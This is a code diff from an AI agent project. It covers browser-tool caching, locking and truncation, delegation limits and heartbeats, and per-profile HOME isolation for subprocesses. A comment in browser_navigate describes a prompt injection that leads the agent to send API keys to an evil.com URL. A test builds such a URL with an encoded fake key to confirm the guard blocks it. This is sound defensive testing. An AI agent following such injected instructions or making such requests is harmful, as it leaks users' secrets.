base_env = {"HOME": "/root", "PATH": "/usr/bin"}
from tools.environments.local import _sanitize_subprocess_env
result = _sanitize_subprocess_env(base_env)
assert result["HOME"] == "/root"
# ---------------------------------------------------------------------------
# Profile bootstrap
# ---------------------------------------------------------------------------
class TestProfileBootstrap:
"""Verify new profiles get a home/ subdirectory."""
def test_profile_dirs_includes_home(self):
from hermes_cli.profiles import _PROFILE_DIRS
assert "home" in _PROFILE_DIRS
def test_create_profile_bootstraps_home_dir(self, tmp_path, monkeypatch):
"""create_profile() should create home/ inside the profile dir."""
home = tmp_path / ".hermes"
home.mkdir()
monkeypatch.setattr(Path, "home", lambda: tmp_path)
monkeypatch.setenv("HERMES_HOME", str(home))
from hermes_cli.profiles import create_profile
profile_dir = create_profile("testbot", no_alias=True)
assert (profile_dir / "home").is_dir()
# ---------------------------------------------------------------------------
# Python process HOME unchanged
# ---------------------------------------------------------------------------
class TestPythonProcessUnchanged:
"""Confirm the Python process's own HOME is never modified."""
def test_path_home_unchanged_after_subprocess_home_resolved(
self, tmp_path, monkeypatch
):
hermes_home = tmp_path / "hermes"
hermes_home.mkdir()
(hermes_home / "home").mkdir()
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
original_home = os.environ.get("HOME")
original_path_home = str(Path.home())
from hermes_constants import get_subprocess_home
sub_home = get_subprocess_home()
# Subprocess home is set but Python HOME stays the same
assert sub_home is not None
assert os.environ.get("HOME") == original_home
assert str(Path.home()) == original_path_home
+271
View File
@@ -0,0 +1,271 @@
"""Tests for browser_tool.py hardening: caching, security, thread safety, truncation."""
import inspect
import os
from unittest.mock import MagicMock, patch
import pytest
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def _reset_caches():
"""Reset all module-level caches so tests start clean."""
import tools.browser_tool as bt
bt._cached_agent_browser = None
bt._agent_browser_resolved = False
bt._cached_command_timeout = None
bt._command_timeout_resolved = False
# lru_cache for _discover_homebrew_node_dirs
if hasattr(bt._discover_homebrew_node_dirs, "cache_clear"):
bt._discover_homebrew_node_dirs.cache_clear()
@pytest.fixture(autouse=True)
def _clean_caches():
_reset_caches()
yield
_reset_caches()
# ---------------------------------------------------------------------------
# Dead code removal
# ---------------------------------------------------------------------------
class TestDeadCodeRemoval:
"""Verify dead code was actually removed."""
def test_no_default_session_timeout(self):
import tools.browser_tool as bt
assert not hasattr(bt, "DEFAULT_SESSION_TIMEOUT")
def test_browser_close_schema_removed(self):
from tools.browser_tool import BROWSER_TOOL_SCHEMAS
names = [s["name"] for s in BROWSER_TOOL_SCHEMAS]
assert "browser_close" not in names
# ---------------------------------------------------------------------------
# Caching: _find_agent_browser
# ---------------------------------------------------------------------------
class TestFindAgentBrowserCache:
def test_cached_after_first_call(self):
import tools.browser_tool as bt
with patch("shutil.which", return_value="/usr/bin/agent-browser"):
result1 = bt._find_agent_browser()
result2 = bt._find_agent_browser()
assert result1 == result2 == "/usr/bin/agent-browser"
assert bt._agent_browser_resolved is True
def test_cache_cleared_by_cleanup(self):
import tools.browser_tool as bt
bt._cached_agent_browser = "/fake/path"
bt._agent_browser_resolved = True
bt.cleanup_all_browsers()
assert bt._agent_browser_resolved is False
def test_not_found_cached_raises_on_subsequent(self):
"""After FileNotFoundError, subsequent calls should raise from cache."""
import tools.browser_tool as bt
from pathlib import Path
original_exists = Path.exists
def mock_exists(self):
if "node_modules" in str(self) and "agent-browser" in str(self):
return False
return original_exists(self)
with patch("shutil.which", return_value=None), \
patch("os.path.isdir", return_value=False), \
patch.object(Path, "exists", mock_exists):
with pytest.raises(FileNotFoundError):
bt._find_agent_browser()
# Second call should also raise (from cache)
with pytest.raises(FileNotFoundError, match="cached"):
bt._find_agent_browser()
# ---------------------------------------------------------------------------
# Caching: _get_command_timeout
# ---------------------------------------------------------------------------
class TestCommandTimeoutCache:
def test_default_is_30(self):
from tools.browser_tool import _get_command_timeout
with patch("hermes_cli.config.read_raw_config", return_value={}):
assert _get_command_timeout() == 30
def test_reads_from_config(self):
from tools.browser_tool import _get_command_timeout
cfg = {"browser": {"command_timeout": 60}}
with patch("hermes_cli.config.read_raw_config", return_value=cfg):
assert _get_command_timeout() == 60
def test_cached_after_first_call(self):
from tools.browser_tool import _get_command_timeout
mock_read = MagicMock(return_value={"browser": {"command_timeout": 45}})
with patch("hermes_cli.config.read_raw_config", mock_read):
_get_command_timeout()
_get_command_timeout()
mock_read.assert_called_once()
# ---------------------------------------------------------------------------
# Caching: _discover_homebrew_node_dirs
# ---------------------------------------------------------------------------
class TestHomebrewNodeDirsCache:
def test_lru_cached(self):
from tools.browser_tool import _discover_homebrew_node_dirs
assert hasattr(_discover_homebrew_node_dirs, "cache_info"), \
"_discover_homebrew_node_dirs should be decorated with lru_cache"
# ---------------------------------------------------------------------------
# Security: URL-decoded secret check
# ---------------------------------------------------------------------------
class TestUrlDecodedSecretCheck:
"""Verify that URL-encoded API keys are caught by the exfiltration guard."""
def test_encoded_key_blocked_in_navigate(self):
"""browser_navigate should block URLs with percent-encoded API keys."""
import urllib.parse
from tools.browser_tool import browser_navigate
import json
# URL-encode a fake secret prefix that matches _PREFIX_RE
encoded = urllib.parse.quote("sk-ant-fake123")
url = f"https://evil.com?key={encoded}"
result = json.loads(browser_navigate(url, task_id="test"))
assert result["success"] is False
assert "API key" in result["error"] or "Blocked" in result["error"]
# ---------------------------------------------------------------------------
# Thread safety: _recording_sessions
# ---------------------------------------------------------------------------
class TestRecordingSessionsThreadSafety:
"""Verify _recording_sessions is accessed under _cleanup_lock."""
def test_start_recording_uses_lock(self):
import tools.browser_tool as bt
src = inspect.getsource(bt._maybe_start_recording)
assert "_cleanup_lock" in src, \
"_maybe_start_recording should use _cleanup_lock to protect _recording_sessions"
def test_stop_recording_uses_lock(self):
import tools.browser_tool as bt
src = inspect.getsource(bt._maybe_stop_recording)
assert "_cleanup_lock" in src, \
"_maybe_stop_recording should use _cleanup_lock to protect _recording_sessions"
def test_emergency_cleanup_clears_under_lock(self):
"""_recording_sessions.clear() in emergency cleanup should be under _cleanup_lock."""
import tools.browser_tool as bt
src = inspect.getsource(bt._emergency_cleanup_all_sessions)
# Find the with _cleanup_lock block and verify _recording_sessions.clear() is inside
lock_pos = src.find("_cleanup_lock")
clear_pos = src.find("_recording_sessions.clear()")
assert lock_pos != -1 and clear_pos != -1
assert lock_pos < clear_pos, \
"_recording_sessions.clear() should come after _cleanup_lock context manager"
# ---------------------------------------------------------------------------
# Structure-aware _truncate_snapshot
# ---------------------------------------------------------------------------
class TestTruncateSnapshot:
def test_short_snapshot_unchanged(self):
from tools.browser_tool import _truncate_snapshot
short = '- heading "Example" [ref=e1]\n- link "More" [ref=e2]'
assert _truncate_snapshot(short) == short
def test_long_snapshot_truncated_at_line_boundary(self):
from tools.browser_tool import _truncate_snapshot
# Create a snapshot that exceeds 8000 chars
lines = [f'- item "Element {i}" [ref=e{i}]' for i in range(500)]
snapshot = "\n".join(lines)
assert len(snapshot) > 8000
result = _truncate_snapshot(snapshot, max_chars=200)
assert len(result) <= 300 # some margin for the truncation note
assert "truncated" in result.lower()
# Every line in the result should be complete (not cut mid-element)
for line in result.split("\n"):
if line.strip() and "truncated" not in line.lower():
assert line.startswith("- item") or line == ""
def test_truncation_reports_remaining_count(self):
from tools.browser_tool import _truncate_snapshot
lines = [f"- line {i}" for i in range(100)]
snapshot = "\n".join(lines)
result = _truncate_snapshot(snapshot, max_chars=200)
# Should mention how many lines were truncated
assert "more line" in result.lower()
# ---------------------------------------------------------------------------
# Scroll optimization
# ---------------------------------------------------------------------------
class TestScrollOptimization:
def test_agent_browser_path_uses_pixel_scroll(self):
"""Verify agent-browser path uses single pixel-based scroll, not 5x loop."""
import tools.browser_tool as bt
src = inspect.getsource(bt.browser_scroll)
assert "_SCROLL_PIXELS" in src, \
"browser_scroll should use _SCROLL_PIXELS for agent-browser path"
# ---------------------------------------------------------------------------
# Empty stdout = failure
# ---------------------------------------------------------------------------
class TestEmptyStdoutFailure:
def test_empty_stdout_returns_failure(self):
"""Verify _run_browser_command returns failure on empty stdout."""
import tools.browser_tool as bt
src = inspect.getsource(bt._run_browser_command)
assert "returned no output" in src, \
"_run_browser_command should treat empty stdout as failure"
def test_empty_ok_commands_is_module_level_frozenset(self):
"""_EMPTY_OK_COMMANDS should be a module-level frozenset, not defined inside a function."""
import tools.browser_tool as bt
assert hasattr(bt, "_EMPTY_OK_COMMANDS")
assert isinstance(bt._EMPTY_OK_COMMANDS, frozenset)
assert "close" in bt._EMPTY_OK_COMMANDS
assert "record" in bt._EMPTY_OK_COMMANDS
# ---------------------------------------------------------------------------
# _camofox_eval bug fix
# ---------------------------------------------------------------------------
class TestCamofoxEvalFix:
def test_uses_correct_ensure_tab_signature(self):
"""_camofox_eval should pass task_id string to _ensure_tab, not a session dict."""
import tools.browser_tool as bt
src = inspect.getsource(bt._camofox_eval)
# Should NOT call _get_session at all — _ensure_tab handles it
assert "_get_session" not in src, \
"_camofox_eval should not call _get_session (removed unused import)"
# Should use body= not json_data=
assert "json_data=" not in src, \
"_camofox_eval should use body= kwarg for _post, not json_data="
assert "body=" in src
+16 -3
View File
@@ -15,6 +15,19 @@ from tools.browser_tool import (
_SANE_PATH,
check_browser_requirements,
)
import tools.browser_tool as _bt
@pytest.fixture(autouse=True)
def _clear_browser_caches():
"""Clear lru_cache and manual caches between tests."""
_discover_homebrew_node_dirs.cache_clear()
_bt._cached_agent_browser = None
_bt._agent_browser_resolved = False
yield
_discover_homebrew_node_dirs.cache_clear()
_bt._cached_agent_browser = None
_bt._agent_browser_resolved = False
class TestSanePath:
@@ -38,7 +51,7 @@ class TestDiscoverHomebrewNodeDirs:
def test_returns_empty_when_no_homebrew(self):
"""Non-macOS systems without /opt/homebrew/opt should return empty."""
with patch("os.path.isdir", return_value=False):
assert _discover_homebrew_node_dirs() == []
assert _discover_homebrew_node_dirs() == ()
def test_finds_versioned_node_dirs(self):
"""Should discover node@20/bin, node@24/bin etc."""
@@ -68,13 +81,13 @@ class TestDiscoverHomebrewNodeDirs:
with patch("os.path.isdir", return_value=True), \
patch("os.listdir", return_value=["node"]):
result = _discover_homebrew_node_dirs()
assert result == []
assert result == ()
def test_handles_oserror_gracefully(self):
"""Should return empty list if listdir raises OSError."""
with patch("os.path.isdir", return_value=True), \
patch("os.listdir", side_effect=OSError("Permission denied")):
assert _discover_homebrew_node_dirs() == []
assert _discover_homebrew_node_dirs() == ()
class TestFindAgentBrowser:
+164 -6
View File
@@ -13,13 +13,14 @@ import json
import os
import sys
import threading
import time
import unittest
from unittest.mock import MagicMock, patch
from tools.delegate_tool import (
DELEGATE_BLOCKED_TOOLS,
DELEGATE_TASK_SCHEMA,
MAX_CONCURRENT_CHILDREN,
_get_max_concurrent_children,
MAX_DEPTH,
check_delegate_requirements,
delegate_task,
@@ -66,7 +67,7 @@ class TestDelegateRequirements(unittest.TestCase):
self.assertIn("context", props)
self.assertIn("toolsets", props)
self.assertIn("max_iterations", props)
self.assertEqual(props["tasks"]["maxItems"], 3)
self.assertNotIn("maxItems", props["tasks"]) # removed — limit is now runtime-configurable
class TestChildSystemPrompt(unittest.TestCase):
@@ -167,10 +168,13 @@ class TestDelegateTask(unittest.TestCase):
"summary": "Done", "api_calls": 1, "duration_seconds": 1.0
}
parent = _make_mock_parent()
tasks = [{"goal": f"Task {i}"} for i in range(5)]
limit = _get_max_concurrent_children()
tasks = [{"goal": f"Task {i}"} for i in range(limit + 2)]
result = json.loads(delegate_task(tasks=tasks, parent_agent=parent))
# Should only run 3 tasks (MAX_CONCURRENT_CHILDREN)
self.assertEqual(mock_run.call_count, 3)
# Should return an error instead of silently truncating
self.assertIn("error", result)
self.assertIn("Too many tasks", result["error"])
mock_run.assert_not_called()
@patch("tools.delegate_tool._run_single_child")
def test_batch_ignores_toplevel_goal(self, mock_run):
@@ -561,7 +565,7 @@ class TestBlockedTools(unittest.TestCase):
self.assertIn(tool, DELEGATE_BLOCKED_TOOLS)
def test_constants(self):
self.assertEqual(MAX_CONCURRENT_CHILDREN, 3)
self.assertEqual(_get_max_concurrent_children(), 3)
self.assertEqual(MAX_DEPTH, 2)
@@ -1052,5 +1056,159 @@ class TestChildCredentialLeasing(unittest.TestCase):
child._credential_pool.release_lease.assert_called_once_with("cred-a")
class TestDelegateHeartbeat(unittest.TestCase):
"""Heartbeat propagates child activity to parent during delegation.
Without the heartbeat, the gateway inactivity timeout fires because the
parent's _last_activity_ts freezes when delegate_task starts.
"""
def test_heartbeat_touches_parent_activity_during_child_run(self):
"""Parent's _touch_activity is called while child.run_conversation blocks."""
from tools.delegate_tool import _run_single_child
parent = _make_mock_parent()
touch_calls = []
parent._touch_activity = lambda desc: touch_calls.append(desc)
child = MagicMock()
child.get_activity_summary.return_value = {
"current_tool": "terminal",
"api_call_count": 3,
"max_iterations": 50,
"last_activity_desc": "executing tool: terminal",
}
# Make run_conversation block long enough for heartbeats to fire
def slow_run(**kwargs):
time.sleep(0.25)
return {"final_response": "done", "completed": True, "api_calls": 3}
child.run_conversation.side_effect = slow_run
# Patch the heartbeat interval to fire quickly
with patch("tools.delegate_tool._HEARTBEAT_INTERVAL", 0.05):
_run_single_child(
task_index=0,
goal="Test heartbeat",
child=child,
parent_agent=parent,
)
# Heartbeat should have fired at least once during the 0.25s sleep
self.assertGreater(len(touch_calls), 0,
"Heartbeat did not propagate activity to parent")
# Verify the description includes child's current tool detail
self.assertTrue(
any("terminal" in desc for desc in touch_calls),
f"Heartbeat descriptions should include child tool info: {touch_calls}")
def test_heartbeat_stops_after_child_completes(self):
"""Heartbeat thread is cleaned up when the child finishes."""
from tools.delegate_tool import _run_single_child
parent = _make_mock_parent()
touch_calls = []
parent._touch_activity = lambda desc: touch_calls.append(desc)
child = MagicMock()
child.get_activity_summary.return_value = {
"current_tool": None,
"api_call_count": 1,
"max_iterations": 50,
"last_activity_desc": "done",
}
child.run_conversation.return_value = {
"final_response": "done", "completed": True, "api_calls": 1,
}
with patch("tools.delegate_tool._HEARTBEAT_INTERVAL", 0.05):
_run_single_child(
task_index=0,
goal="Test cleanup",
child=child,
parent_agent=parent,
)
# Record count after completion, wait, and verify no more calls
count_after = len(touch_calls)
time.sleep(0.15)
self.assertEqual(len(touch_calls), count_after,
"Heartbeat continued firing after child completed")
def test_heartbeat_stops_after_child_error(self):
"""Heartbeat thread is cleaned up even when the child raises."""
from tools.delegate_tool import _run_single_child
parent = _make_mock_parent()
touch_calls = []
parent._touch_activity = lambda desc: touch_calls.append(desc)
child = MagicMock()
child.get_activity_summary.return_value = {
"current_tool": "web_search",
"api_call_count": 2,
"max_iterations": 50,
"last_activity_desc": "executing tool: web_search",
}
def slow_fail(**kwargs):
time.sleep(0.15)
raise RuntimeError("network timeout")
child.run_conversation.side_effect = slow_fail
with patch("tools.delegate_tool._HEARTBEAT_INTERVAL", 0.05):
result = _run_single_child(
task_index=0,
goal="Test error cleanup",
child=child,
parent_agent=parent,
)
self.assertEqual(result["status"], "error")
# Verify heartbeat stopped
count_after = len(touch_calls)
time.sleep(0.15)
self.assertEqual(len(touch_calls), count_after,
"Heartbeat continued firing after child error")
def test_heartbeat_includes_child_activity_desc_when_no_tool(self):
"""When child has no current_tool, heartbeat uses last_activity_desc."""
from tools.delegate_tool import _run_single_child
parent = _make_mock_parent()
touch_calls = []
parent._touch_activity = lambda desc: touch_calls.append(desc)
child = MagicMock()
child.get_activity_summary.return_value = {
"current_tool": None,
"api_call_count": 5,
"max_iterations": 90,
"last_activity_desc": "API call #5 completed",
}
def slow_run(**kwargs):
time.sleep(0.15)
return {"final_response": "done", "completed": True, "api_calls": 5}
child.run_conversation.side_effect = slow_run
with patch("tools.delegate_tool._HEARTBEAT_INTERVAL", 0.05):
_run_single_child(
task_index=0,
goal="Test desc fallback",
child=child,
parent_agent=parent,
)
self.assertGreater(len(touch_calls), 0)
self.assertTrue(
any("API call #5 completed" in desc for desc in touch_calls),
f"Heartbeat should include last_activity_desc: {touch_calls}")
if __name__ == "__main__":
unittest.main()
+119 -61
View File
@@ -50,6 +50,7 @@ Usage:
"""
import atexit
import functools
import json
import logging
import os
@@ -100,27 +101,27 @@ _SANE_PATH = (
)
def _discover_homebrew_node_dirs() -> list[str]:
@functools.lru_cache(maxsize=1)
def _discover_homebrew_node_dirs() -> tuple[str, ...]:
"""Find Homebrew versioned Node.js bin directories (e.g. node@20, node@24).
When Node is installed via ``brew install node@24`` and NOT linked into
/opt/homebrew/bin, the binary lives only in /opt/homebrew/opt/node@24/bin/.
This function discovers those paths so they can be added to subprocess PATH.
/opt/homebrew/bin, agent-browser isn't discoverable on the default PATH.
This function finds those directories so they can be prepended.
"""
dirs: list[str] = []
homebrew_opt = "/opt/homebrew/opt"
if not os.path.isdir(homebrew_opt):
return dirs
return tuple(dirs)
try:
for entry in os.listdir(homebrew_opt):
if entry.startswith("node") and entry != "node":
# e.g. node@20, node@24
bin_dir = os.path.join(homebrew_opt, entry, "bin")
if os.path.isdir(bin_dir):
dirs.append(bin_dir)
except OSError:
pass
return dirs
return tuple(dirs)
# Throttle screenshot cleanup to avoid repeated full directory scans.
_last_screenshot_cleanup_by_dir: dict[str, float] = {}
@@ -132,28 +133,39 @@ _last_screenshot_cleanup_by_dir: dict[str, float] = {}
# Default timeout for browser commands (seconds)
DEFAULT_COMMAND_TIMEOUT = 30
# Default session timeout (seconds)
DEFAULT_SESSION_TIMEOUT = 300
# Max tokens for snapshot content before summarization
SNAPSHOT_SUMMARIZE_THRESHOLD = 8000
# Commands that legitimately return empty stdout (e.g. close, record).
_EMPTY_OK_COMMANDS: frozenset = frozenset({"close", "record"})
_cached_command_timeout: Optional[int] = None
_command_timeout_resolved = False
def _get_command_timeout() -> int:
"""Return the configured browser command timeout from config.yaml.
Reads ``config["browser"]["command_timeout"]`` and falls back to
``DEFAULT_COMMAND_TIMEOUT`` (30s) if unset or unreadable.
``DEFAULT_COMMAND_TIMEOUT`` (30s) if unset or unreadable. Result is
cached after the first call and cleared by ``cleanup_all_browsers()``.
"""
global _cached_command_timeout, _command_timeout_resolved
if _command_timeout_resolved:
return _cached_command_timeout # type: ignore[return-value]
_command_timeout_resolved = True
result = DEFAULT_COMMAND_TIMEOUT
try:
from hermes_cli.config import read_raw_config
cfg = read_raw_config()
val = cfg.get("browser", {}).get("command_timeout")
if val is not None:
return max(int(val), 5) # Floor at 5s to avoid instant kills
result = max(int(val), 5) # Floor at 5s to avoid instant kills
except Exception as e:
logger.debug("Could not read command_timeout from config: %s", e)
return DEFAULT_COMMAND_TIMEOUT
_cached_command_timeout = result
return result
def _get_vision_model() -> Optional[str]:
@@ -239,6 +251,8 @@ _cached_cloud_provider: Optional[CloudBrowserProvider] = None
_cloud_provider_resolved = False
_allow_private_urls_resolved = False
_cached_allow_private_urls: Optional[bool] = None
_cached_agent_browser: Optional[str] = None
_agent_browser_resolved = False
def _get_cloud_provider() -> Optional[CloudBrowserProvider]:
@@ -415,7 +429,7 @@ def _emergency_cleanup_all_sessions():
with _cleanup_lock:
_active_sessions.clear()
_session_last_activity.clear()
_recording_sessions.clear()
_recording_sessions.clear()
# Register cleanup via atexit only. Previous versions installed SIGINT/SIGTERM
@@ -617,15 +631,6 @@ BROWSER_TOOL_SCHEMAS = [
"required": ["key"]
}
},
{
"name": "browser_close",
"description": "Close the browser session and release resources. Call this when done with browser tasks to free up cloud browser session quota.",
"parameters": {
"type": "object",
"properties": {},
"required": []
}
},
{
"name": "browser_get_images",
"description": "Get a list of all images on the current page with their URLs and alt text. Useful for finding images to analyze with the vision tool. Requires browser_navigate to be called first.",
@@ -777,10 +782,26 @@ def _find_agent_browser() -> str:
Raises:
FileNotFoundError: If agent-browser is not installed
"""
global _cached_agent_browser, _agent_browser_resolved
if _agent_browser_resolved:
if _cached_agent_browser is None:
raise FileNotFoundError(
"agent-browser CLI not found (cached). Install it with: "
f"{_browser_install_hint()}\n"
"Or run 'npm install' in the repo root to install locally.\n"
"Or ensure npx is available in your PATH."
)
return _cached_agent_browser
# Note: _agent_browser_resolved is set at each return site below
# (not before the search) to prevent a race where a concurrent thread
# sees resolved=True but _cached_agent_browser is still None.
# Check if it's in PATH (global install)
which_result = shutil.which("agent-browser")
if which_result:
_cached_agent_browser = which_result
_agent_browser_resolved = True
return which_result
# Build an extended search PATH including Homebrew and Hermes-managed dirs.
@@ -800,21 +821,29 @@ def _find_agent_browser() -> str:
extended_path = os.pathsep.join(extra_dirs)
which_result = shutil.which("agent-browser", path=extended_path)
if which_result:
_cached_agent_browser = which_result
_agent_browser_resolved = True
return which_result
# Check local node_modules/.bin/ (npm install in repo root)
repo_root = Path(__file__).parent.parent
local_bin = repo_root / "node_modules" / ".bin" / "agent-browser"
if local_bin.exists():
return str(local_bin)
_cached_agent_browser = str(local_bin)
_agent_browser_resolved = True
return _cached_agent_browser
# Check common npx locations (also search extended dirs)
npx_path = shutil.which("npx")
if not npx_path and extra_dirs:
npx_path = shutil.which("npx", path=os.pathsep.join(extra_dirs))
if npx_path:
return "npx agent-browser"
_cached_agent_browser = "npx agent-browser"
_agent_browser_resolved = True
return _cached_agent_browser
# Nothing found — cache the failure so subsequent calls don't re-scan.
_agent_browser_resolved = True
raise FileNotFoundError(
"agent-browser CLI not found. Install it with: "
f"{_browser_install_hint()}\n"
@@ -935,7 +964,7 @@ def _run_browser_command(
path_parts = [p for p in existing_path.split(":") if p]
candidate_dirs = (
[hermes_node_bin]
+ _discover_homebrew_node_dirs()
+ list(_discover_homebrew_node_dirs())
+ [p for p in _SANE_PATH.split(":") if p]
)
@@ -994,15 +1023,15 @@ def _run_browser_command(
level = logging.WARNING if returncode != 0 else logging.DEBUG
logger.log(level, "browser '%s' stderr: %s", command, stderr.strip()[:500])
# Log empty output as warning — common sign of broken agent-browser
if not stdout.strip() and returncode == 0:
logger.warning("browser '%s' returned empty stdout with rc=0. "
"cmd=%s stderr=%s",
command, " ".join(cmd_parts[:4]) + "...",
(stderr or "")[:200])
stdout_text = stdout.strip()
# Empty output with rc=0 is a broken state — treat as failure rather
# than silently returning {"success": True, "data": {}}.
# Some commands (close, record) legitimately return no output.
if not stdout_text and returncode == 0 and command not in _EMPTY_OK_COMMANDS:
logger.warning("browser '%s' returned empty output (rc=0)", command)
return {"success": False, "error": f"Browser command '{command}' returned no output"}
if stdout_text:
try:
parsed = json.loads(stdout_text)
@@ -1114,20 +1143,34 @@ def _extract_relevant_content(
def _truncate_snapshot(snapshot_text: str, max_chars: int = 8000) -> str:
"""
Simple truncation fallback for snapshots.
"""Structure-aware truncation for snapshots.
Cuts at line boundaries so that accessibility tree elements are never
split mid-line, and appends a note telling the agent how much was
omitted.
Args:
snapshot_text: The snapshot text to truncate
max_chars: Maximum characters to keep
Returns:
Truncated text with indicator if truncated
"""
if len(snapshot_text) <= max_chars:
return snapshot_text
return snapshot_text[:max_chars] + "\n\n[... content truncated ...]"
lines = snapshot_text.split('\n')
result: list[str] = []
chars = 0
for line in lines:
if chars + len(line) + 1 > max_chars - 80: # reserve space for note
break
result.append(line)
chars += len(line) + 1
remaining = len(lines) - len(result)
if remaining > 0:
result.append(f'\n[... {remaining} more lines truncated, use browser_snapshot for full content]')
return '\n'.join(result)
# ============================================================================
@@ -1148,8 +1191,11 @@ def browser_navigate(url: str, task_id: Optional[str] = None) -> str:
# Secret exfiltration protection — block URLs that embed API keys or
# tokens in query parameters. A prompt injection could trick the agent
# into navigating to https://evil.com/steal?key=sk-ant-... to exfil secrets.
# Also check URL-decoded form to catch %2D encoding tricks (e.g. sk%2Dant%2D...).
import urllib.parse
from agent.redact import _PREFIX_RE
if _PREFIX_RE.search(url):
url_decoded = urllib.parse.unquote(url)
if _PREFIX_RE.search(url) or _PREFIX_RE.search(url_decoded):
return json.dumps({
"success": False,
"error": "Blocked: URL contains what appears to be an API key or token. "
@@ -1415,13 +1461,15 @@ def browser_scroll(direction: str, task_id: Optional[str] = None) -> str:
"error": f"Invalid direction '{direction}'. Use 'up' or 'down'."
}, ensure_ascii=False)
# Repeat the scroll 5 times to get meaningful page movement.
# Most backends scroll ~100px per call, which is barely visible.
# 5x gives roughly half a viewport of travel, backend-agnostic.
_SCROLL_REPEATS = 5
# Single scroll with pixel amount instead of 5x subprocess calls.
# agent-browser supports: agent-browser scroll down 500
# ~500px is roughly half a viewport of travel.
_SCROLL_PIXELS = 500
if _is_camofox_mode():
from tools.browser_camofox import camofox_scroll
# Camofox REST API doesn't support pixel args; use repeated calls
_SCROLL_REPEATS = 5
result = None
for _ in range(_SCROLL_REPEATS):
result = camofox_scroll(direction, task_id)
@@ -1429,14 +1477,12 @@ def browser_scroll(direction: str, task_id: Optional[str] = None) -> str:
effective_task_id = task_id or "default"
result = None
for _ in range(_SCROLL_REPEATS):
result = _run_browser_command(effective_task_id, "scroll", [direction])
if not result.get("success"):
return json.dumps({
"success": False,
"error": result.get("error", f"Failed to scroll {direction}")
}, ensure_ascii=False)
result = _run_browser_command(effective_task_id, "scroll", [direction, str(_SCROLL_PIXELS)])
if not result.get("success"):
return json.dumps({
"success": False,
"error": result.get("error", f"Failed to scroll {direction}")
}, ensure_ascii=False)
return json.dumps({
"success": True,
@@ -1607,11 +1653,11 @@ def _browser_eval(expression: str, task_id: Optional[str] = None) -> str:
def _camofox_eval(expression: str, task_id: Optional[str] = None) -> str:
"""Evaluate JS via Camofox's /tabs/{tab_id}/eval endpoint (if available)."""
from tools.browser_camofox import _get_session, _ensure_tab, _post
from tools.browser_camofox import _ensure_tab, _post
try:
session = _get_session(task_id or "default")
tab_id = _ensure_tab(session)
resp = _post(f"/tabs/{tab_id}/eval", json_data={"expression": expression})
tab_info = _ensure_tab(task_id or "default")
tab_id = tab_info.get("tab_id") or tab_info.get("id")
resp = _post(f"/tabs/{tab_id}/eval", body={"expression": expression})
# Camofox returns the result in a JSON envelope
raw_result = resp.get("result") if isinstance(resp, dict) else resp
@@ -1641,8 +1687,9 @@ def _camofox_eval(expression: str, task_id: Optional[str] = None) -> str:
def _maybe_start_recording(task_id: str):
"""Start recording if browser.record_sessions is enabled in config."""
if task_id in _recording_sessions:
return
with _cleanup_lock:
if task_id in _recording_sessions:
return
try:
from hermes_cli.config import read_raw_config
hermes_home = get_hermes_home()
@@ -1662,7 +1709,8 @@ def _maybe_start_recording(task_id: str):
result = _run_browser_command(task_id, "record", ["start", str(recording_path)])
if result.get("success"):
_recording_sessions.add(task_id)
with _cleanup_lock:
_recording_sessions.add(task_id)
logger.info("Auto-recording browser session %s to %s", task_id, recording_path)
else:
logger.debug("Could not start auto-recording: %s", result.get("error"))
@@ -1672,8 +1720,9 @@ def _maybe_start_recording(task_id: str):
def _maybe_stop_recording(task_id: str):
"""Stop recording if one is active for this session."""
if task_id not in _recording_sessions:
return
with _cleanup_lock:
if task_id not in _recording_sessions:
return
try:
result = _run_browser_command(task_id, "record", ["stop"])
if result.get("success"):
@@ -1682,7 +1731,8 @@ def _maybe_stop_recording(task_id: str):
except Exception as e:
logger.debug("Could not stop recording for %s: %s", task_id, e)
finally:
_recording_sessions.discard(task_id)
with _cleanup_lock:
_recording_sessions.discard(task_id)
def browser_get_images(task_id: Optional[str] = None) -> str:
@@ -2041,6 +2091,14 @@ def cleanup_all_browsers() -> None:
for task_id in task_ids:
cleanup_browser(task_id)
# Reset cached lookups so they are re-evaluated on next use.
global _cached_agent_browser, _agent_browser_resolved
global _cached_command_timeout, _command_timeout_resolved
_cached_agent_browser = None
_agent_browser_resolved = False
_discover_homebrew_node_dirs.cache_clear()
_cached_command_timeout = None
_command_timeout_resolved = False
# ============================================================================
+7
View File
@@ -1020,6 +1020,13 @@ def execute_code(
if _tz_name:
child_env["TZ"] = _tz_name
# Per-profile HOME isolation: redirect system tool configs into
# {HERMES_HOME}/home/ when that directory exists.
from hermes_constants import get_subprocess_home
_profile_home = get_subprocess_home()
if _profile_home:
child_env["HOME"] = _profile_home
proc = subprocess.Popen(
[sys.executable, "script.py"],
cwd=tmpdir,
+1 -1
View File
@@ -455,7 +455,7 @@ Important safety rule: cron-run sessions should not recursively schedule more cr
},
"deliver": {
"type": "string",
"description": "Delivery target: origin, local, telegram, discord, slack, whatsapp, signal, matrix, mattermost, homeassistant, dingtalk, feishu, wecom, email, sms, bluebubbles, or platform:chat_id or platform:chat_id:thread_id for Telegram topics. Examples: 'origin', 'local', 'telegram', 'telegram:-1001234567890:17585', 'discord:#engineering'"
"description": "Delivery target: origin, local, telegram, discord, slack, whatsapp, signal, weixin, matrix, mattermost, homeassistant, dingtalk, feishu, wecom, email, sms, bluebubbles, or platform:chat_id or platform:chat_id:thread_id for Telegram topics. Examples: 'origin', 'local', 'telegram', 'telegram:-1001234567890:17585', 'discord:#engineering'"
},
"skills": {
"type": "array",
+87 -5
View File
@@ -20,6 +20,7 @@ import json
import logging
logger = logging.getLogger(__name__)
import os
import threading
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import Any, Dict, List, Optional
@@ -34,9 +35,36 @@ DELEGATE_BLOCKED_TOOLS = frozenset([
"execute_code", # children should reason step-by-step, not write scripts
])
MAX_CONCURRENT_CHILDREN = 3
_DEFAULT_MAX_CONCURRENT_CHILDREN = 3
MAX_DEPTH = 2 # parent (0) -> child (1) -> grandchild rejected (2)
def _get_max_concurrent_children() -> int:
"""Read delegation.max_concurrent_children from config, falling back to
DELEGATION_MAX_CONCURRENT_CHILDREN env var, then the default (3).
Uses the same ``_load_config()`` path that the rest of ``delegate_task``
uses, keeping config priority consistent (config.yaml > env > default).
"""
cfg = _load_config()
val = cfg.get("max_concurrent_children")
if val is not None:
try:
return max(1, int(val))
except (TypeError, ValueError):
logger.warning(
"delegation.max_concurrent_children=%r is not a valid integer; "
